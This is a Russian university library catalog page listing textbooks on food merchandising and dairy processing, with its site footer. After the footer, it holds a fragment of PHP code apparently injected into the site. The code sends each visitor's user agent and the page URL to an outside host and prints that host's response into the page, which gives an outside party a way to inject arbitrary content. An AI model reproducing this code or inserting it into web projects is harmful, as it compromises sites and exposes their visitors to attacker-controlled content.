ПРОДОВОЛЬСТВЕННЫЕ ТОВАРЫ -- КОНДИТЕРСКИЕ ТОВАРЫ -- МОЛОЧНЫЕ ТОВАРЫ -- ПИЩЕВЫЕ ЖИРЫ -- МЯСНЫЕ ПРОДУКТЫ -- ЯИЧНЫЕ ТОВАРЫ -- РЫБНЫЕ ТОВАРЫ -- ВКУСОВЫЕ ТОВАРЫ -- ПЛОДООВОЩЫЕ ТОВАРЫ -- ЗЕРНО -- ПИЩЕВЫЕ КОНЦЕНТРАТЫ -- ПРИПРАВА -- ЧАЙ -- КОФЕ -- НАПИТОК чайный -- ПРЯНОСТИ -- ТАБАК -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- Крахмал -- Сахар -- Мед -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- МОЛОКО -- Мороженое -- СЫР -- ЖИР пищевой -- Масло растительное -- Маргарин -- Жир кулинарный -- МЯСО -- ЯЙЦЕПРОДУКТЫ -- Концентрат пищевой -- РЫБА

В книге рассматриваются основные вопросы товароведения продовольственных товаров в современных условиях; приведены необходимые <продавцу> и <товароведу> сведения по всем группам <товаров>, а также по вопросам <стандартизации> и <сертификации>, информационному обеспечению, которые позволят работникам торговли принимать квалифицированные решения в <коммерческой деятельности>.

15. 
Проектирование предприятий молочной отрасли с основами промстроительства [Текст] : учеб. пособие для вузов по специальности 260303 "Технология молока и молочных продуктов" направления подгот. дипломир. специалистов 260300 "Технология сырья и продуктов животного происхождения" / Л. В. Голубева [и др.], 2010. - 284, [1] с.
Держатели документа (Информация об экземплярах) 

Рассмотрены основные типы предприятий, основы автоматизированного проектирования, изложены основные вопросы проектирования и сметной документации при строительстве и реконструкции предприятий. Дан перечень типовых проектов заводов, их особенности и преимущества перед индивидуальными проектами. Приведены особенности курсового и дипломного проектирования, дипломной работы для бакалавриата.

16. 
Расчет материальных потоков при переработке молока в курсовом и дипломном проектировании [Текст] : учеб. пособие для вузов по направлению 260300 "Технология сырья и продуктов животного происхождения" по специальности "Технология молока и молочных продуктов" / И. А. Евдокимов [и др.], 2009. - 271 с.
Держатели документа (Информация об экземплярах) 

Учебное пособие представляет собой руководство по выполнению расчетов материальных потоков при переработке молока на различные виды молочных продуктов цельномолочного, маслодельного, сыродельного и молочноконсервного направлений. В пособии приведены схемы безотходной переработки молока на продукты цельномолочного производства, масло, сыр и молочные консервы, нормы расхода сырья и основных компонентов при выработке молочных продуктов, нормируемые потери по отдельным технологическим операциям, рецептурные составы основных видов продуктов.

17. 
Товароведение и экспертиза потребительских товаров [Текст] : Учебник для студентов торговых вузов / рук. авт. кол. В.В. Шевченко, 2003. - 544 с.
Ключевые слова 
товароведение -- экспертиза товаров -- ЗЕРНОМУЧНЫЕ ТОВАРЫ -- КОНДИТЕРСКИЕ ТОВАРЫ -- МОЛОЧНЫЕ ТОВАРЫ -- ПИЩЕВЫЕ ЖИРЫ -- МЯСНЫЕ ТОВАРЫ -- РЫБНЫЕ ТОВАРЫ -- ТОВАРОВЕДЕНИЕ -- КОНСЕРВИРОВАНИЕ -- ТАРА -- УПАКОВКА -- КРУПА -- МУКИ -- ХЛЕБ -- ХЛЕБОБУЛОЧНЫЕ ИЗДЕЛИЯ -- МАКАРОННЫЕ ИЗДЕЛИЯ -- ТОВАРОВЕДЕНИЕ ПЛОДОВ И ОВОЩЕЙ -- ГРИБЫ -- ЧАЙ -- КОФЕ -- НАПИТКИ БЕЗАЛКОГОЛЬНЫЕ -- НАПИТКИ АЛКОГОЛЬНЫЕ -- ТАБАЧНАЯ ПРОДУКЦИЯ -- ПРЯНОСТИ -- ПРИПРАВЫ -- МЕД -- ТОВАРОВЕДЕНИЕ КОНДИТЕРСКИХ ТОВАРОВ -- ТОВАРОВЕДЕНИЕ МОЛОЧНЫХ ТОВАРОВ -- СЫР -- МОРОЖЕНОЕ -- МАЙОНЕЗ -- МЯСНЫЕ КОНСЕРВЫ -- ПОЛУФАБРИКАТЫ -- ЯЙЦА -- ИКРА
Держатели документа (Информация об экземплярах) 
18. 
Товароведение и экспертиза пищевых жиров, молока и молочных продуктов [Текст] : Учебник гриф-УМО / под ред. М. С. Касторных, 2003. - 288 с.
Держатели документа (Информация об экземплярах) 
19. 
Бургат, Виталий Викторович. Разработка комплекса маркетинговых коммуникаций производственного предприятия [Текст] : Монография / В. В. Бургат, 2009. - 178 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
20. 
Абатуров, Павел Васильевич. Сладкие блюда. Напитки [Текст] / П. В. Абатуров, Н. П. Цыпленков, 1958. - 136 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2994 - 21.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.93 с.12 запросов, 0.57c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;